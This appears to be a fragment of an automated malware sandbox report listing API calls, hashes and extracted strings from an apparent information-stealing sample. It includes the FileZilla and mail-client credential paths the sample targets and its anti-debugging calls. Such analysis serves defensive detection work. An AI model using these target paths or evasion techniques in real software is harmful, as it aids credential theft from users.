                                                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044D36A,00000001,00000364,00000000,00000008,000000FF,?,00447A98,00426F52,?,?), ref: 00450371
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 9d9d3e8b2bef017808805eba958564c636c8c3ec0520770245b5987c827fdf69
                                                            • Instruction ID: 035a614d3876f6906020b157cdd10206fdefeae5334def747215f66390aa104c
                                                            • Opcode Fuzzy Hash: 9d9d3e8b2bef017808805eba958564c636c8c3ec0520770245b5987c827fdf69
                                                            • Instruction Fuzzy Hash: BBF05939200620A7AB205B728C01B6B3758AF81772B044127FC08DA282DA38DC09C6EE
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,00426DF1,?,?,00426DF1,?), ref: 0044EBA1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 46e01d2afbdcef2c31f25b6f499ced1eedd9cf58f859f57e9987ca3508fff049
                                                            • Instruction ID: b54a30de40d39881521df567edad888a5efcf5dcf9e065f2953d68bc5b8e4da5
                                                            • Opcode Fuzzy Hash: 46e01d2afbdcef2c31f25b6f499ced1eedd9cf58f859f57e9987ca3508fff049
                                                            • Instruction Fuzzy Hash: 3AE0E5212001A56AFA30A767CC01B6B3A4DFF417B8F010037ED47A62D1DBACEC0285AE
                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0277918E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3054761261.0000000002778000.00000040.00000020.00020000.00000000.sdmp, Offset: 02778000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2778000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                            • Instruction ID: d9ce2544757ee690adb991b9ea77ff0065fbb3f1af8012c1cab67ae5992f8ef4
                                                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                            • Instruction Fuzzy Hash: 08113C79A00208EFDB01DF98C989E99BBF5AF08350F0580A4FA489B361D371EA50DF80
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _strlen$DevicesDisplayEnum
                                                            • String ID: Ver$$jRk$4jn`$4jn`$Aan($C: $TT4$n._$n: $o._$o._$p7 C$q7 C$sion$x_B>$y_B>$y_B>
                                                            • API String ID: 1530566421-3982382533
                                                            • Opcode ID: 6eb8ba310e44b2876d547a58f4b1bd6c84751028df2a66b4d8a3ef139639d485
                                                            • Instruction ID: 28abc732f20c3b8f0eae9c6754692627178cb2246ef32338a06096b249fd69e5
                                                            • Opcode Fuzzy Hash: 6eb8ba310e44b2876d547a58f4b1bd6c84751028df2a66b4d8a3ef139639d485
                                                            • Instruction Fuzzy Hash: F203D4F1B30B059BDB349F28C891626B7F4AB44711B14892EE5ABCBB60E771F445CB42
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrlen
                                                            • String ID: "B!H$"B!H$K2&e$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$L2&e$L2&e$Y[[T$bi${#9${#9$Y=`$Y=`
                                                            • API String ID: 1659193697-3907602706
                                                            • Opcode ID: 768fb7a2f0fcaf3e91eab243bd8818269c9345fad69c19ca9c68321193467208
                                                            • Instruction ID: 555b9416e07e3c80436ed450aa82b4a156fee13c64b4245b541d1ce9eda8a1e0
                                                            • Opcode Fuzzy Hash: 768fb7a2f0fcaf3e91eab243bd8818269c9345fad69c19ca9c68321193467208
                                                            • Instruction Fuzzy Hash: D0F2D7B1F3161A8BDF349ED888556BDBBF0EB04310F248516E505EB2D2E774BA40DB92
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: "w$ "w$EeS$EeS$EeS$JI3i$KI3i$KI3i$VL6T$VL6T$_m.Q$_m.Q$eo>w$fo>w$fo>w$mNA/
                                                            • API String ID: 0-3469262258
                                                            • Opcode ID: e6d9c21a7490ec2a00f5106aa89416e629d5b74fe5aeb65d2d60d2ef2e2dda1a
                                                            • Instruction ID: 940333cea2cae281202974213db5a182ad23de1a9c3b2c3e5250ada020942bba
                                                            • Opcode Fuzzy Hash: e6d9c21a7490ec2a00f5106aa89416e629d5b74fe5aeb65d2d60d2ef2e2dda1a
                                                            • Instruction Fuzzy Hash: 2D03D374F2056A9BCF28DF98CB84ABDB6F1EF14704F10095AD515FB260E370AA41DB92
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 042311AC
                                                            • RtlAllocateHeap.NTDLL(?,00000008,00000028), ref: 04231752
                                                            • GetDIBits.GDI32(?,00000001,00000000,?,?,00000001,00000000), ref: 04232461
                                                            • ReleaseDC.USER32(00000000,?), ref: 0423246B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap$BitsRelease
                                                            • String ID: $jRk$?$TT4$TT4$q7 C$q7 C$y_B>$y_B>
                                                            • API String ID: 2392854675-2600574631
                                                            • Opcode ID: 0fe5284bdf45d83cd6d71459b9714451c746a96b2f378b9609cc4e18fca22abc
                                                            • Instruction ID: e1cbe2c7ebbf59c6081e42900622a6e9df0f2b8f3b067d5eed50a06222060bd3
                                                            • Opcode Fuzzy Hash: 0fe5284bdf45d83cd6d71459b9714451c746a96b2f378b9609cc4e18fca22abc
                                                            • Instruction Fuzzy Hash: D8C205F4F3052ACBDF24DF98C9806BDB6B4BB04705F20456AD905EB350E371AA51CBA6
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _strlen
                                                            • String ID: A@6e$A@6e$RY30$^^4$^^4$ame=$ilen
                                                            • API String ID: 4218353326-3679160039
                                                            • Opcode ID: 6343018893d56b40ec195c5c117dfc83d0fc6755fe54ce157062feabbfcac08c
                                                            • Instruction ID: 090ace7f8c7b47eeca8eaa8b58fb1e00915e800adec8f7469202be9907a34481
                                                            • Opcode Fuzzy Hash: 6343018893d56b40ec195c5c117dfc83d0fc6755fe54ce157062feabbfcac08c
                                                            • Instruction Fuzzy Hash: 2872C575F6021A8BDF34CF98C8925BDBAF0AF24704F244526E515EB6B4E374B640CB92
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _strncpy
                                                            • String ID: $jRk$$jRk$TT4$TT4$mE$x_B>$y_B>$y_B>
                                                            • API String ID: 2961919466-2403683918
                                                            • Opcode ID: 0fce3017fde26660b2fe1cd63b9b85230b5f86defa1d6f60f2e91c8398972e3b
                                                            • Instruction ID: 667c9a75c8364bc9b8b4448cda8f791e13b92f29cde2fae444fc0ef99f1a9d41
                                                            • Opcode Fuzzy Hash: 0fce3017fde26660b2fe1cd63b9b85230b5f86defa1d6f60f2e91c8398972e3b
                                                            • Instruction Fuzzy Hash: ED82F7F1F3021AABDF24CE98D8555BDB6B4AB05316F25052BD419EB350E770FAC18B82
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $jRk$%appdata%\FileZilla$?$@an($Aan($Aan($Applications/FileZilla$ST4$TT4$TT4$q7 C$y_B>
                                                            • API String ID: 0-929912511
                                                            • Opcode ID: ac9e16b0cfef5ad753a7f837f43482241b5d65ef7839f325e8b94ed3ba3a55b2
                                                            • Instruction ID: 1139473923217a6d54be6837cda2370714b62adc9fa03969546fdec72437510f
                                                            • Opcode Fuzzy Hash: ac9e16b0cfef5ad753a7f837f43482241b5d65ef7839f325e8b94ed3ba3a55b2
                                                            • Instruction Fuzzy Hash: 93C208B1F3023ABBDF28AAAC8B5157EB574AF00304F250527E505FA290F6B5B941D793
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _strlen
                                                            • String ID: &$($:[
                                                            • API String ID: 4218353326-884455141
                                                            • Opcode ID: 3034d82a480cb8f89dcfb5f74ad732d6c5b154c1f034d4a1a20f2f670bf56c56
                                                            • Instruction ID: c87b6764f31c47551850ae898339b34680ffe6f9dead823671f1205c70d94d3d
                                                            • Opcode Fuzzy Hash: 3034d82a480cb8f89dcfb5f74ad732d6c5b154c1f034d4a1a20f2f670bf56c56
                                                            • Instruction Fuzzy Hash: 6712D1B0B2565A8BCF18DF58D49066DBBF0EFA4310F14892AE445EB3B4D774BA41CB42
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _strlen
                                                            • String ID: Ju^%$Ku^%$Y=`$Y=`$Y=`
                                                            • API String ID: 4218353326-1811093487
                                                            • Opcode ID: 7e7365d4cd31fbe0e14a79a9d93457875f355017f8b93497c9b28fb78c111860
                                                            • Instruction ID: b08feaa50fef4eba56fea00542095c7d9cd4c69dd1f3476e29b715071575ad26
                                                            • Opcode Fuzzy Hash: 7e7365d4cd31fbe0e14a79a9d93457875f355017f8b93497c9b28fb78c111860
                                                            • Instruction Fuzzy Hash: 6F62B1F5F2021A8BCF24CF9888955BDBBB0AB44342F24056AD456FB251E375FA41CB92
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _strlen
                                                            • String ID: (lu$)lu$)lu$n_v$n_v$u2B$v2B$v2B
                                                            • API String ID: 4218353326-1100714106
                                                            • Opcode ID: fec3558fb2b960feac3edba5045be27680f3dec78b11801a2127f42b7adf476c
                                                            • Instruction ID: 242fc8ce717049e49b0f3f65a52fe7baae6dc808f5f416ef97f3620d52f29d73
                                                            • Opcode Fuzzy Hash: fec3558fb2b960feac3edba5045be27680f3dec78b11801a2127f42b7adf476c
                                                            • Instruction Fuzzy Hash: F972A8F5F3051A8BCF24CF9CC8855BDBBB0AB15316F14056AD545EB790E3B0AA81CB92
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $jRk$$jRk$ST4$TT4$q7 C$q7 C$y_B>
                                                            • API String ID: 0-4120928008
                                                            • Opcode ID: 19062003c26532868454498e227e50f3dc71298f1981b794ebff368204a50fa7
                                                            • Instruction ID: 3985ef9f58ae415830c538595cd1ed746da78635a1b1a6d489967139ebf314fe
                                                            • Opcode Fuzzy Hash: 19062003c26532868454498e227e50f3dc71298f1981b794ebff368204a50fa7
                                                            • Instruction Fuzzy Hash: EC92CBB1728322EBD724AE28CA9163DBBE1EB94750F158D1FF185CB290D670E491DB07
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(fltl), ref: 04226645
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID: A8r$dll$fltl$ib.d
                                                            • API String ID: 1029625771-252788044
                                                            • Opcode ID: 2039658f1a3f0192b30e54c42d1fc0f10245b4772019d9c249726f779701915c
                                                            • Instruction ID: 07efba29e14e43a613ee0d169dc99ef5c8fc7475050680d38b3f41efd3dcc968
                                                            • Opcode Fuzzy Hash: 2039658f1a3f0192b30e54c42d1fc0f10245b4772019d9c249726f779701915c
                                                            • Instruction Fuzzy Hash: F2E1A473B39222BBCB24AE18C78522D7BE1EF90744F145D1EE095CB294E6B4F5909B43
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: EeS$EeS$UL6T$VL6T$VL6T
                                                            • API String ID: 0-1377693644
                                                            • Opcode ID: 822facb60093e5c78bbde4163aef7a75eac0453c728f865f1413c4f3083f18a3
                                                            • Instruction ID: 3afb7a84ec999f3e643c3c43a920778a79b1d3074ef0197ad5c21f6fde40e59b
                                                            • Opcode Fuzzy Hash: 822facb60093e5c78bbde4163aef7a75eac0453c728f865f1413c4f3083f18a3
                                                            • Instruction Fuzzy Hash: 60E24BF1F301066BEF28AA948C8557FB9F4DF00700F288826E905E66D2E674FA54D797
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ?$ST4$TT4$x_B>$y_B>$y_B>
                                                            • API String ID: 0-2374627004
                                                            • Opcode ID: 02d0fd0443d9d51e028c47f058a80f2cd0009247c9e0929960f9bfe9abe723b5
                                                            • Instruction ID: fb8d951185fc021a9d5acbff8cea610f7200aa7de14add9e93e4172ce2b318e5
                                                            • Opcode Fuzzy Hash: 02d0fd0443d9d51e028c47f058a80f2cd0009247c9e0929960f9bfe9abe723b5
                                                            • Instruction Fuzzy Hash: 62523BB1F3022BABDF28DF98CA4257DB671FB14300F544626D012EAAA0E7B5B541C787
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (lu$)lu$Mail Clients\The Bat\AppData$Mail Clients\The Bat\Local$n_v$n_v
                                                            • API String ID: 0-3310705457
                                                            • Opcode ID: 7bf9955990434cfb00a5bd9f7622437a54179299fee655f26a020719653d2004
                                                            • Instruction ID: 94191128c085cde86b96c65ed76dd9a157b6bec3d037a9133f5753495ebc0445
                                                            • Opcode Fuzzy Hash: 7bf9955990434cfb00a5bd9f7622437a54179299fee655f26a020719653d2004
                                                            • Instruction Fuzzy Hash: A942D7B1F3012A7ADF24DE588E5567E7F74EB00344F240926E415F62A1E365BB80C7A3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: UL6T$VL6T
                                                            • API String ID: 0-3136271418
                                                            • Opcode ID: 8359da0d40d20ee8e83e49935313afc930907d22c7ff5b46e8d0eb1bbd30fa68
                                                            • Instruction ID: 01c1213bef5866a9263d520c993ea4fa7c49fd82f2901951b9c435f6c82f1ad9
                                                            • Opcode Fuzzy Hash: 8359da0d40d20ee8e83e49935313afc930907d22c7ff5b46e8d0eb1bbd30fa68
                                                            • Instruction Fuzzy Hash: BD32C8B5F3410ACBDF24DE58898917EB6F0AB04350F248957D816EB2D3E674EE4096E2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$CloseCreateHandleModuleName
                                                            • String ID: T5 S$U5 S$U5 S$]cnq$fS))
                                                            • API String ID: 2106025501-2879408294
                                                            • Opcode ID: 4cc957b51dab68ea6b59bc913a1bf740dbf24a7c456668d412c3ef1561a4ad06
                                                            • Instruction ID: 8bd9b6fefe0b10d12a6878d444b7395462c1b02a59bed5863410f180ba52476e
                                                            • Opcode Fuzzy Hash: 4cc957b51dab68ea6b59bc913a1bf740dbf24a7c456668d412c3ef1561a4ad06
                                                            • Instruction Fuzzy Hash: B4A270B1728311ABDB289F18C69422DBAE0BB85754F548D1EF099CB360E6B4F481DB43
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (lu$)lu$)lu$n_v$n_v
                                                            • API String ID: 0-3830700584
                                                            • Opcode ID: 19f3eafb4a0e727bd08de773a29381a3a5c2a5b051c77c6b774b19f95aa7016b
                                                            • Instruction ID: a90aad1f9ce4ceb8edf9a75303dd05e6c3ac0452cc3f745fbd4978e07ea941f6
                                                            • Opcode Fuzzy Hash: 19f3eafb4a0e727bd08de773a29381a3a5c2a5b051c77c6b774b19f95aa7016b
                                                            • Instruction Fuzzy Hash: E722A1B4F2424ACBCF24CF98C9905BEBBF0EB28314F25455AD525EB271D370A542CB92
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _strrchr
                                                            • String ID:
                                                            • API String ID: 3213747228-0
                                                            • Opcode ID: 12bee11bf7391676ae73bf0f68abedb6b2fa3ae6387d4d45c0890e18c1b165f5
                                                            • Instruction ID: 779e557c9c9b088074bf7c34a8543ab410b13080c94a2e324292f3f4ff170428
                                                            • Opcode Fuzzy Hash: 12bee11bf7391676ae73bf0f68abedb6b2fa3ae6387d4d45c0890e18c1b165f5
                                                            • Instruction Fuzzy Hash: 47B15B32F202469FEB19CF68C9807FEBBA5EFC9354F1641A6D915AB241D274F901CB60
                                                            APIs
                                                            • FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 042522BE
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 04252339
                                                            • FindClose.KERNEL32(00000000), ref: 0425235B
                                                            • FindClose.KERNEL32(00000000), ref: 0425237E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$CloseFile$FirstNext
                                                            • String ID:
                                                            • API String ID: 1164774033-0
                                                            • Opcode ID: 98469444129287ec3a0223e4e6863df554afa6925fe0b01ec864058e1a2505ac
                                                            • Instruction ID: 117129d92e1e5b36cf366f87f5e213ba268871734a89e08f059cff1725c8afe6
                                                            • Opcode Fuzzy Hash: 98469444129287ec3a0223e4e6863df554afa6925fe0b01ec864058e1a2505ac
                                                            • Instruction Fuzzy Hash: 0341A471B1022AFADB20DFA4DC88AAAB378EB84204F0441D5ED05D7194FA70AE84CF75
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _strlen
                                                            • String ID: 0$8
                                                            • API String ID: 4218353326-46163386
                                                            • Opcode ID: 38b8936eb4140eae30aee7312caf29dcbdd29765460d38eb1dc49951334f1799
                                                            • Instruction ID: c9892142ea6023f293ded1132443d12fbd1d015c87addfd107d468fea6a9c957
                                                            • Opcode Fuzzy Hash: 38b8936eb4140eae30aee7312caf29dcbdd29765460d38eb1dc49951334f1799
                                                            • Instruction Fuzzy Hash: 7C7234716183419FD714CF18C880AAEBBE2AFD8354F04892DF99987361D771E958CB92
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0423D108
                                                            • IsDebuggerPresent.KERNEL32 ref: 0423D1D4
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0423D1F4
                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 0423D1FE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                            • String ID:
                                                            • API String ID: 254469556-0
                                                            • Opcode ID: 5a224689ebe3c8543fae9108879d47dacd2795cfdd161b4ae1d22f43ac1ac262
                                                            • Instruction ID: 5b9321f01d49e09d62f90b93f42e5523b2e2bfb2e3491e52a6843812127096a7
                                                            • Opcode Fuzzy Hash: 5a224689ebe3c8543fae9108879d47dacd2795cfdd161b4ae1d22f43ac1ac262
                                                            • Instruction Fuzzy Hash: 0C314BB5D1121DDBEB20DF60D989BCCBBB8AF08705F1040AAE40CA7250EBB19A85CF55
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Ku^%$Ku^%$Y=`$Y=`
                                                            • API String ID: 0-3617128223
                                                            • Opcode ID: 5f34cb384d69458e94695c2cbe6bafde1a605cae2f8802c300460b8e96db7d5c
                                                            • Instruction ID: 26b44049f6169eeff4c4035e2360c8f1f44e536defe586e34ff16b41b6787472
                                                            • Opcode Fuzzy Hash: 5f34cb384d69458e94695c2cbe6bafde1a605cae2f8802c300460b8e96db7d5c
                                                            • Instruction Fuzzy Hash: A7F1F6B0F3020A8FCF249F98C88167D7AE4BB14310F24C926E411EA6E2E775F565DB52
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Mail Clients\eM Client$]^4$^^4$^^4
                                                            • API String ID: 0-1928883120
                                                            • Opcode ID: 2b4910dd263b016b495e14fa66466277187321ac52993c0523f68307dfe2152f
                                                            • Instruction ID: 8a0ceb9f399fd4a03d7338a195b05b05f48bfd935f6f2ab205e8421203266694
                                                            • Opcode Fuzzy Hash: 2b4910dd263b016b495e14fa66466277187321ac52993c0523f68307dfe2152f
                                                            • Instruction Fuzzy Hash: FDE13AB1F3016BABEF288E58CF856BE76B4AB14304F244626D015FB350E675EA41C793
                                                            APIs
                                                            • lstrcmpiW.KERNEL32(0045FAC2,0045FAC2,?,?,?,?,?,?,?,?,?,?,?,?,?,-000017AA), ref: 0423BA0C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcmpi
                                                            • String ID: VL6T$VL6T
                                                            • API String ID: 1586166983-2204272895
                                                            • Opcode ID: b34f7b6829543c5bcafa32b40e3420d98b0dff8f829e495a6d6cd6807b993e14
                                                            • Instruction ID: f3977b164b1b8f8a2a4f253e1082d05a7bcfec30144387130bf1dc950821ddd5
                                                            • Opcode Fuzzy Hash: b34f7b6829543c5bcafa32b40e3420d98b0dff8f829e495a6d6cd6807b993e14
                                                            • Instruction Fuzzy Hash: AB12B7F5F2411A8BCF28CE5C84952BD7EB0BB44742F64052AD516EF362E275FA40CB92
                                                            APIs
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,04205EEC), ref: 0424E69A
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,04205EEC), ref: 0424E6A4
                                                            • UnhandledExceptionFilter.KERNEL32(0045F807,?,?,?,?,?,04205EEC), ref: 0424E6B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                            • String ID:
                                                            • API String ID: 3906539128-0
                                                            • Opcode ID: fddfd219bb87237c86172eb2c7764efb5dcc82193680edb944fc16078175a50e
                                                            • Instruction ID: ea44e08286307ac2787e62328fb5bbaaadf267314a11dd2f17ba5bb294662092
                                                            • Opcode Fuzzy Hash: fddfd219bb87237c86172eb2c7764efb5dcc82193680edb944fc16078175a50e
                                                            • Instruction Fuzzy Hash: 4E31C47491122D9BDB21DF24D988BDDBBB8FF08710F5041EAE41CA7260EB70AB858F45
                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(?,?,00000200), ref: 04224E75
                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 04224E89
